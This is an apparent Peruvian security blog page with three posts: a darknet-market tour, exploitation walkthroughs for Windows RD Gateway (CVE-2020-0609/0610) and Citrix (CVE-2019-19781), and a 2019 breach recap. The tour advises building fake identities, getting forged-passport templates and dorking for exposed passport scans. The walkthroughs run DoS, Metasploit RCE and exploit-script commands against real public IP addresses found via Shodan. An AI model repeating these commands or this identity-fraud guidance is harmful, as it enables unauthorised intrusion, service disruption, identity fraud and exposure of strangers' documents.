domingo, 26 de enero de 2020

Darkmarket - El mercado negro de la ciberdelincuencia


Hola, estimados lectores en esta oportunidad vamos hablar de un tema bastante llamativo "Dark Market" que es el mercado negro en servidores .ONION donde podemos encontrar desde servicios de hacking,venta de drogas,armas, etc.

Estos mercados lo podemos encontrar de manera virtual o física, en Perú estos son unos de los mercados negros existentes.

Es negocio redondo de ventas de base de datos se ha  vuelto muy comercial en estos últimos años, latino América se esta incorporando la venta de información sensible en portales y sitios específicos.

En mi país se han liberado varios Leaks de base de datos de  manera publica por grupos de hackivistas o vendidos en el mercado negro.

Millones de datos fueron liberados en el año 2015 de una entidad gubernamental, una persona mal intencionada podría convertir ese documento de 2.5GB de texto plano a un tipo de formato SQL (ETL) y crear una herramienta que podría obtener datos de cualquiera persona mediantes consultas.



En latinoamérica existen muchos colectivos que ejercen este tipo de negocios, no los mencionara no por miedo, simplemente no me gusta dar luz a otras personas :)

En fin, hace años encontré una vulnerabilidad de un banco X (que por cierto reporte la vulnerabilidad y fue reparada por los administradores), pero conversando con un buen amigo de años me comento, el porque no venderla en el mercado negro.

PoC Banco:



Se podrían imaginar cuantos robos se hubieran cometido si otra persona no ética hubiera encontrado la falla antes que yo?

En estos años también recuerdo que un amigo mio me comento de un objetivo que le habían "Pagado" para que accediera al portal de una entidad militar X y obtuviera información relevante.

Elaborar el Pentesting fue demasiado fácil, pero solo hice pruebas más no me aproveche de la información o se la entregue a mi amigo.




En consecuente, tengo muchas anectodas de amigos que no tengo comunicación con ellos hace muchos años pero quizás sigan trabajando de esa manera.
Moraleja, no  todo estos tipos de negocios de hacen ocultos en la red profunda :)

Ahora si empecemos a entrar algunos portales .ONION para conocer más este tipo de negocio.

Durante tu estadía en la dark web en negociaciones debes tener en cuenta ciertas cosas importantes:

    1) Investigar bien las fuentes para verificar que es un negocio real y no una estafa digital.

    2) Establecer el mayor anonimato posible no se te pedirá (Identificación, Correo Personal).

    3) Crear una identidad (Nombre Falso, Nombre De Usuario, Correo Falso) y sobre todo que tu contraseña no sea la misma que la de tu correo personal

    4) tomar medidas de anonimato usando proxy o simplemente usar TOR.

    5) No todos los sitios de la dark web son considerados .onion existen foros públicos donde pueden vender información secreta y confidencial.

    6) lo único que integra la dark web en .onion a sitios .com es que estos no te piden “Identificacion y detalles personales” en cuanto compras de armas y droga en linea.

C​reando una falsa identidad:

Existen​ muchas maneras de comprar una identidad o crear por tu cuenta una ante que todo deberías tener en cuenta de dispone las plantillas que corresponden a cada pasaporte de cada uno de los países donde quieras integrar tu nueva identidad.

la existencia de sitios webs públicos y visibles ante los buscadores se da a conocer fácilmente tan fácil como solicitar el diseño de 10 pasaportes falsos de distintas nacionalidades pues es fácil de adaptarse a la compra y venta sitios como besstdoc24hrs.com y usuarios en foros se especializan por lo tanto me ha llamado la atención sobre cuánto podría ser la ganancia de un falsificador de pasaportes en línea.

C​rear una identidad falsa en línea:

Se ha requerido mucho el uso de herramientas que permitan establecer todas las funciones en tan solo un simple formulario que pueda involucrar información personal entre ellos:

    • SSN falso

    • Nombres , Teléfonos , Dirección, Seguros


por ello existe un sitio web llamado fakenamegenerator.com que permite realizar dicha funcion y que con facilidad permite generar una identidad falsa con una facilidad que cualquiera podría realizar.


Buscar Passports Con Motores De Búsqueda:

Puedes usar las dorks que corresponden para ubicar directorios que te permitan visualizar los pasaports mal almacenados en un servidor mal configurado como el apache.


utilizan dorks sencillas y básicas se comprende cómo nos puede facilitar la búsqueda.


    • inurl:wp-content/uploads/ passport .jpg

    • Para Sitios Basados en el directorio uplaods de Wordpress

    • intitle:Index of / passport .pdf

    • Para Ubicar Cualquier Directorio Con El Pasaporte Adjuntado En Un PDF también puede variar como en formatos “JPG/PNG”

Continuando con nuestra incorporación a una identidad falsas es obvio que requerimos plantillas de pasaporte de diferentes países para generar una identidad falsa luego darla por impresa y darle uso físico o virtual tanto para realizar pagos en línea sobre sitios webs públicos pero nunca ser usado en la dark web.

tomaremos en cuenta un listado de alternativos como son el uso de correos basados en anonimato y cifrado de mensajes.

1 - Protonmail:
protonmail.com - Todo el USP de Protonmail.com es proteger su privacidad a través de sofisticadas técnicas de encriptación. Cuando te registres, no exigirán una gran cantidad de información de verificación. Todo lo que necesita para proporcionar es un nombre de usuario y una contraseña. Y no ofrecerán extras adicionales, solo un simple cliente de correo electrónico para enviar correo cifrado de forma segura.

Otros proveedores de emails:
  • Tutanota
  • LavaBit
  • Hushmail
  • Canary Mail
Mecanismos de pagos en la Dark Web:

La criptomoneda es una de las maneras de pago en la dark web pero no cualquiera criptomoneda pues conoce a las 02 más populares en la dark web y aca unas de ellas:

    • bitcoin

    • Ethereum

Pagos Exitosos:

  • bitcoin
  • dinero físico presencial
¿Comprar Bitcoin?

Los sitios populares para comprar bitcoin aunque con comisiones son aquellos como virwox y unos que otros sin comisiones es el localbitcoin y al menos con comisión de un dólar por transacción coinbase.

    • virwox (Comisión Por conversión desde 10$ a 6$ dólares)

    • localbitcoin ( Comisión 0 )

    • coinbase (Comisión 0,0001378 por transacción)


¿ Por Qué La Venta De Armas En La Dark Web?






Se han creado dominios onion para la venta de armamentos desde ventas de altos calibres como incluso manuales de explosivos también armas diseñadas por el mismo usuario es decir fabricadas en casa en la dark web está no llegan a domicilio tampoco te gestionan un ticket para ir a retirarlo en una tienda por que como sabemos requieres de una licencia y tu identificación para los vendedores de armas que una vez fueron legales han notado que sus ventas han bajado de lo contrario en la venta ilegal de armas por medio de sitios webs existen tres mecanismos de ganancia:

1 - Por comision de compra y publicación

2 - Pagos para encabezar su producto

3 - Ventas sin ninguna restricción y en completo anonimato

exclusivamente en el sitio de ventas de armas no suele ser una tienda oficial por lo tanto solo te comunican con el vendedor del armamento para aclarar un punto de encuentro y conseguir el armamento por lo general el que requiere urgentemente el armamento suelen ser individuos que han sido arrestados o integrantes en carteles y mafias.

los pagos se realizan en efectivo en un punto de encuentro y unas que otras plataformas solo aceptan bitcoin para evitar que se divulgue información personal bancaria. 


https://bit.ly/2TZxpi8


Navegadores de busqueda:


AHMIA

http://msydqstlz2kzerdg.onion/
Not Evil



si empezamos a navegar y buscar algunas paginas de nuestro interes , en mi caso un SHOP DE CC'S llamado "UnderMarket 2.0"




Portales de ventas de sustancias prohibidas.


Foro de UFO

























Podemos encontrar mas servicios hasta documentos del gobierno EE.UU, entre demás países.

Les dejare el portal TorLinks para que puedan familiarizar con varias categorias de servicios onion.





Tambien podemos encontrar las famosas ventas de base de datos y documentos sensibles de organizaciones a nivel mundial.




Descarga de base de dato Turkish:



¿Deseas crear un servidor ONION?



¿Deseas aprender a utilizar Tor?



Servicios de Anonimato



Saludos a mi buen amigo Kelvin Parra de venezuela, entre 2 compartimos este articulo para ustedes.
Si desean visitar a kelvin puedes seguirlo en sus redes sociales:


Saludos, desde Peru y Venezuela.

Exploiting CVE-2020-0609 & CVE-2020-0610 - PoC DoS

Hola estimados fieles lectores, en esta oportunidad tocaremos las nuevas vulnerabilidades encontradas en el sistema operativo Windows el 14 de enero de este año 2020.

CVE-2020-0609 & CVE-2020-0610

Estas 2 vulneabilidades permiten ejecutar codigo de manera remota en el servicio de Windows Remote Control Gateway (RD Gateway), este tipo de ataque permite que el hacker se pueda conectar al servidor RDP sin autentificación enviando  código remotos al sistema operativo(0x00 - 0xFFFF) 
Los datos a escribir también son arbitrarios con una longitud de hasta 1000 bytes a la vez y un máximo de 4096 durante una sesión.

RD Gateway Actúa como un proxy RDP entre alguno servidores internos de red.
Este servicio UDP lo puedes identificar con el N. 3391 por defecto.

Pueden utilizar SHODAN para encontrar algunos servicios vulnerables y poder auditarlo con una herramienta de análisis de vulnerabilidades para las versiones de CVE.

Versiones vulnerables:
  • Windows Server 2012
  • Windows Server 2012 R2
  • Windows Server 2016
    Windows Server 2019
https://beta.shodan.io/search?query=port%3A3391+


Tenemos aproximadamente 19,116 objetivos encontrados que podemos testear para nuestra prueba de concepto.

https://beta.shodan.io/search?query=port%3A3391+country%3A%22PE%22

En mi caso yo elaborare el testing con algunos servicios de Perú.

Exploit BlueGate fue creado por Marcus Hutchins, esta herramienta permite analizar un objetivo y testear si es vulnerable, también tiene un modulo de ataque de DoS para dejar fuera de servicio el protocolo RD Gateway.

 A simple vista podemos ver que esta herramienta ejecuta comandos arbitarios del sistema y la conexión SSL para el cifrado de paquetes.

[email protected]:~/Exploits/CVE-2020-0609-CVE-2020-0610/BlueGate# python3 BlueGate.py -M check -P 3391 190.40.170.19

[email protected]:~/Exploits/CVE-2020-0609-CVE-2020-0610/BlueGate# python3 BlueGate.py -M dos -P 3391 190.40.170.19
[*] Sending DoS packets to 190.40.170.19...

Les adjunto el exploit en Github si desean realizas sus pruebas de concepto.
https://github.com/ollypwn/BlueGate


Elaborando un mapeo de peticiones con Wireshark podemos ver como las peticiones pasan cifradas y los tipos de respuesta son aceptados por sitio web dando como resultado un envio de paquetes de manera masiva.

1000, b"\x41"*1000

Tambien nos arroja el numero de HOST del sistema operativo del servidor vulnerable:

WIN-H7M6A4JVDR3

Según fuentes oficiales de Microsoft ya se estan desarrollando exploit que puedan permitir acceder a los sistemas operativos por envios de Payloads en los buffer de la memoria interna, como lo fue eternalblue.

Para evitar ser victimas de este ataque remoto, deben bloquear el puerto UDP 3391, en las propiedades de su equipo de servicios.


Mientars tanto microsoft ya lanzo al publico información respecto a la vulnerabilidad en su portal sin embargo todavia no parece encontrar una forma de mitigar esta vulnerabilidad critica.

https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-0609

Recomendación denegar puertos específicos para no permitir conexiones remotas maliciosas, activar tu firewall de tu Router, actualizar los paquetes del sistema operativo y como siempre elaborar backup ante cualquier amenaza de malware que se presente.

También no se olviden de utilizar un IDS, IPS o un DMZ para denegar este tipo de conexion remotas.

Si estas tus pininos como sysadmin te recomiendo descargar y comprarte el firewall GlassWire, para que ganes un poco de experiencia en firewalls a nivel de aplicativos de escritorio.

https://www.glasswire.com/

Saludos.

Explotando CVE-2019-19781 - Citrix Netscaler Gateway


Hola fieles lectores en esta oportunidad les enseñare a encontrar vulnerabilidades en los servicios de Citrix Netscaler Gateway y posteriormente elaborar pruebas de pentesting.

Citrix Netscaler Gateway

Es una aplicacion de acceso de datos seguro para los administradores mediante mecanismos de identificacion y autentificacion.

Este servicio cuenta con servicios de seguridad DMZ, IDS y un tipo de certificado criptografico PKCS que usa para agrupar una clave privada con su certificado X.509 o para agrupar a todos los miembros de una cadena de confianza y poder ejecutar los aplicativos de una organización mediante la conectividad VPN.



Versiones vulnerables:

10.5, 11.1, 12.0, 12.1, y 13.0

Consecuencia:

Ejecución de comandos remotamente.

  • /vpns/
  • /vpn/../vpns/cfg/smb.conf
  • /vpn/../vpns/portal/scripts/newbm.pl

El ataque tuvo un imparto de más de 80 000 mil empresas vulneradas a nivel mundial.

más información:
https://support.citrix.com/article/CTX267027

Encontrando servidores citrix vulnerables

Shodan es un buen aliado para encontrar servicios vulnerables de todo tipo, desde diciembre incorporo el escaneo de vulnerabilidades CVE-2019-19781.
Dorks:

title:"Netscaler" country:"IT"
title:"Netscaler" port:"443"

Si deseas aprender SHODAN, puedes entrar a los siguientes articulos.
https://www.backtrack-omar.com/2015/02/shodan-el-buscador-del-informatico-de.html
https://www.backtrack-omar.com/2016/11/pentesting-con-shodan-exploits.html




https://www.shodan.io/host/92.246.226.211


Nmap - El escaner de redes más potente y utilizado del mundo no se podría quedar atrás, ya cuenta con un modulo (Script) para detectar la vulnerabilidad CVE-2019-19781.
https://github.com/cyberstruggle/DeltaGroup/blob/master/CVE-2019-19781/CVE-2019-19781.nse

Si deseas aprender a utilizar NMAP y Masscan para un escaneo masivo te invito a leer los siguientes articulos.
https://www.backtrack-omar.com/2014/04/aprendiendo-nmap-nivel-basico.html
https://www.backtrack-omar.com/2015/10/comprometiendo-sistemas-nivel-mundial.html
[email protected]:/usr/share/nmap# nmap --script CVE-2019-19781.nse -Pn -v 92.246.226.211 -p 433



Metasploit Framework nuestro framework de pentesting preferido también incorporo su escaner de vulnerabilidades correspondiente.

Configuración de opciones:

msf5 > use exploit/linux/http/citrix_dir_traversal_rce
msf5 exploit(linux/http/citrix_dir_traversal_rce) > set RHOSTS 92.246.226.211
msf5 exploit(linux/http/citrix_dir_traversal_rce) > set RPORT 433
msf5 exploit(linux/http/citrix_dir_traversal_rce) > set SSL yes
msf5 exploit(linux/http/citrix_dir_traversal_rce) > set lhost 192.168.0.150
msf5 exploit(linux/http/citrix_dir_traversal_rce) > run

Resultado:

PoC

Exploit:
https://github.com/projectzeroindia/CVE-2019-19781/blob/master/CVE-2019-19781.sh
[email protected]:~/Exploits/CVE-2019-19781# bash CVE-2019-19781.sh 92.246.226.211 ls

Este exploit nos permite ejecutar comandos de manera remota en el servidor, no obstante debemos tener en cuenta de modificar los permisos y peticiones de nuestros archivos de configuración de citrix para denegar peticiones maliciosas.
Citrix ya publico la manera de fixear esta vulnerabilidad:

Experiencia propia como consultar de seguridad informatica.


Hacemos 3 años trabaje en un Call center de una empresa tercerista de Movistar  y a lo largo de este proceso encontré muchas debilidades pero solo mencionare lo referente a CITRIX

Citrix: Servicio de VPN privado a la red Movistar

ATIS: Es el aplicativo de consultas que brinda el servicio de telefónica, para obtener la información de los clientes en cuanto a sus servicios de cable, telefonía e internet.

Observación: como encargado del área de sistemas, se deben cumplir algunos requisitos de instalaciones y licencias en las maquinas para que estas puedan ser actas para contratar el servicio de instalación, entre ellos los datos del trabajador se recopilan de igual manera.

Antes de generarse el contrato correspondiente, se ejecutan 2 herramientas en la maquina donde se instalo el software de telefónica.

Estas recopilan las informaciones correspondientes:

Importante: Las estaciones de trabajo no deben tener instalado en ningún momento software no permitido, tales como: programas de acceso remoto.  Se realiza verificación en estaciones configuradas.

Cabe aclarar que esas informaciones correspondientes la guardan en su NUBE, sin avisar o establecerlo en el contrato.

Estos datos se pueden obtener en un archivo temporal que se crea en un documento de texto y es enviando al servidor central, al igual que perifericos, versión de componentes de hardware y demas datos computacionales del dispositivo que se ejecutara la instalación.

Las firmas electrónicas hoy en día son esenciales para autentificar y validad los accesos a sitios con restricción de certificado, por otra parte, la criptografía juega un papel importante para proteger la comunicación y el cifrado del documento en si, por otra parte, cumple un estándar de calidad ligado a la seguridad de la información.

Este último nos permitirá una comunicación privada flexible a un servidor dedicado, para ello movistar registra los siguientes datos donde se instaló el software.
Panel de las aplicaciones de Telefonica
Moraleja si esa vulnerabilidad CVE-2019-19781 hubiera alcanzado las empresas con datos de millones de personas, la fuga de información hubiese sido tremenda!

Saludos.

sábado, 25 de enero de 2020

Los hackeos significativos en el 2019



Hola estimados fieles lectores, es un placer dirigirme a ustedes luego de 3 años de ausencia, quisiera pedirle disculpas por mi inactividad repentina y agradecer por su fiel visita a mi blog, con medio millón de vistas.

Este 2019 nos trajo muchas sorpresas respecto a los ataques informáticos, por medio de Malwares, APT, Information Leak, SQL Injection y CVE 0 Days.

Redes Sociales

Las redes de comunicación vitales hoy en día, y gracias a estos portales "Nuestros datos son procesados" para empresas o gobiernos con el único objetivo estudiar nuestro comportamiento y tenernos vigilados en nuestras actividades rutinarias.

Entonces tenemos la otra cara de la moneda, si nuestra información es vulnerada por terceros ¿Que pasaría?

  • Suplantación de identidad
  • Extorsiones 
  • Robo de credenciales
  • Mercado negro
  • Espionaje
Facebook
Marzo:  

Las credenciales de facebook y instagram (Servicio ligado a la red principal) fue vulnerado por una mala gestión de almacenamiento y millones de usuarios fueron victimas de fuga de información.

Abril:


540 millones de credenciales, incluyendo los datos sensibles de los usuarios fueron expuestos por una mala administración de seguridad de la información, valga la redundancia los representantes de esta organización aceptaron que los datos estaban en texto plano.

en meses posteriores nos enteramos que facebook otorgo aplicaciones a mas de 100 "desarrolladores" para obtener información sensible de algunos perfiles de los usuarios, esto tuvo como consecuencia extorsiones.

Todos sabemos que facebook vente nuestra información y eso es lo que genera los activos en la compañia.

Les dejo un video del CEO Mark Zuckerberg testificando ante el Senado de Estados Unidos por el escándalo de Cambridge.



Outlook

Enero:

A inicios de ese año se comprometieron cuentas de personal de soporte y por consecuente la fuga de información de más de un millón de usuarios, dando como resultado correos, carpetas personales y direcciones de emails al ojo de los cibercriminales, la empresa Microsoft tuvo que elaborar una extensiva auditoría en los registros de accesos y bloquear a los usuarios afectados por su seguridad.

Los delincuentes utilizaron este mecanismo de ataque para restablecer alguno servicios ligados a esos correos para realizar extorsiones, envíos de malwares y venta de datos en los mercados negros conocidos.

WhatsApp

MAYO:

Whatsapp fue vulnerado por la compañía NSO Group que descubrió la vulnerabilidad CVE-2019-3568 Consistía en que un hacker podía instalar malware en cualquier móvil con sólo hacer una llamada de voz a través de WhatsApp, este tipo de ataque dirigido fue centrado a personas de alto rango como, miembros del gobierno, diputados, periodistas, etc. Hasta el presente mes solo se supo que 1400 cuentas fueron comprometidas, mientras tanto NSO Group se defiende que utilizo este ataque para proteger a los usuarios de la amenaza presente.

Antes de culminar con esta categoría no podía olvidarme de la famosa aplicación móvil  "FaceAPP"







Este aplicación fue creado por un desarrollador ruso llamado "Yaroslav Goncharov", esta app fue liberada gratuitamente para que los cibernautas  se tomen una selfie y puedan virtualizar como serian de adultos.
(Una herramienta que parece de estar percibido y si ningún perjuicio)

¿Porque se origino molestia en la comunidad de seguridad informática?

Pues es simple, esta app utiliza nuestra información personal incluida nuestras fotos que son tecnologicamente almacenadas para el uso de reconocimiento facial, utilizando la tecnológicas de redes neuronales la información viaja por varios canales de red para validad la información de los usuarios.

Si esta aplicación vendiera nuestra información a gobiernos o la misma NSA o otro estado de seguridad nacional como China o Rusia, seriamos identificados en cualquier parte del mundo o algo peor que su base de datos fuera vulnerada por terroristas.

Pruebas de como los datos vulnerados pueden ser vendidos en algunos mercados negros en los servicios .ONION (Deep Web)


Plataformas de Exchange

Si bien es cierto los Exchange son sitios de divisas de criptomonedas que  son utilizadas por los Trading y en esta categoría enumerare quienes fueron las compañias afectadas y sus perdidas millonarias.
  •     CoinBene - 105M USD
  •     Upbit - 49M USD
  •     Binance - 40M USD
  •     BitPoint - 32M USD
  •     Bithumb - 18.7M
  •     Cryptopia  - 16M USD
  •     DragonEx  - 7.09M USD

Sistemas Bancarios 


En este punto llegamos a una categoría económica donde millones de clientes pueden verse afectados o el mismo banco por incumplir con las políticas de privacidad y pagar millones de dolares por infracción.


Banco Capital One

Paige Thompson, de 33 años octuvo acceso a 100 millones de cuentas de crédito de personas de EE.UU y 6 millones en Canada, hasta el momento se sabe que la hacker Paige burlo un Firewall en la capa 7 del sitio web y tuvo acceso a los servidores web por medio de una vulnerabilidad en el servidor principal a principios de marzo.


Banco de las Islas Caimán

Este ataque se le atribuye al conocido "Hacker" Phineas Fisher vulnerando algunas cuentas bancarias de  La Isla de Man, Chipre, Islas Vírgenes, Seychelles, Belice, Estados Unidos, Reino Unido, Irlanda, etc.

Bancos mexicanos

Los cajeros automáticos seleccionados habían sido infectados previamente con un virus para que en determinada hora y día se retirasen de 30 a 60 mil pesos por cajero, mediante un ataque al servicio SPEI, variante del método era encontrar la vulnerabilidad en los sistemas bancarios para seleccionar cajeros automáticos de los que se extraían de 100 a 200 millones en una sola operación.

En su mayoría los grupos delictivos envían los fondos de las victimas a plataformas para lavar los activos, mediante Exchange - "Bitcoins", compran en sitios en linea conocidos a nivel mundial y envian los productos a su comprador por un precio de 40% menos de lo que cuesta o venden las tarjetas como acabamos de ver en la imagen anterior.

Rasomware

Hasta 174 ciudades fueron víctimas de este tipo de ‘malware’ a lo largo del año. Kaspersky desvela que, aunque tienen menos capacidad para pagar los rescates, son más propensas a aceptar las pretensiones de los ciberdelincuentes.A lo largo de 2019, un total de 174 municipios, con más de 3 000 organizaciones subsidiarias, fueron víctimas de ataques de ransomware.

Durante 2019 las tres familias de ransomware más predominantes fueron Ryuk, Purga y Stop. España concentró un 1,84 % de todos los afectados por Ryuk en el mundo, Purga representó el 0,18 % y Stop, el 0,65 %.

Ryuk $ 3,701,893.98 USD.

 Purga 1,610,093.98 USD.



STOP 1,031,00.18 USD.


Entre otras amenazas que se vieron como INTEL, Android (Proyecto Zero), CISCO, WPA2, iOS, Linux, etc que permitieron que algunos de los ataques mencionados tuvieran éxito, como no recordar el año 2017 cuando EternalBlue atacaba los servidor SMB vulnerables y se elaboro el ataque de malware masivo infectando millones de ordenadores con el ransomware "Wannacry".

Si bien es cierto estimadores lectores, la unica manera de estar expuestos a estos ataques es no conectarte a internet (Lo que una persona normal pensaría) como un agente de seguridad informática, las empresas deben estar a un paso adelante de estos ataques, elaborar mecanismos de contingencia ante cualquier amenaza vigente mediante el proceso de Hardenning a nivel de las 7 capas existentes y la humana(Para evitar ataques de ingenieria social).
En el estándar internacional ISO 27001 tenemos los Dominios Tecnológicos de Seguridad incorporan los activos de la información que van a proteger y cumplir las buenas practicas de estandarización en nuestra organización.
  • Seguridad Logica
  • Seguridad Fisica 
  • Seguridad Organizativa
  • Seguridad Legal
Tengan en cuenta que en este mundo de las tecnologías de información las amenazas se clasifican, controlan y supervisan constantemente.
"No existe una cura, cuando no se prueba el veneno"

Espero que les haya gustado este articulo, los espero en el proximo post.
Un saludo.

Datos del Autor

Estudiante de Ingeniería de computación y sistemas en Perú.
actualmente me estoy dedicando a dar ponencias sobre seguridad Informática.
Soy una persona sencilla y humilde que me encanta aprender nuevos temas en mis tiempos libres.

"Me considero un novato en busca de conocimiento"


Entradas Populares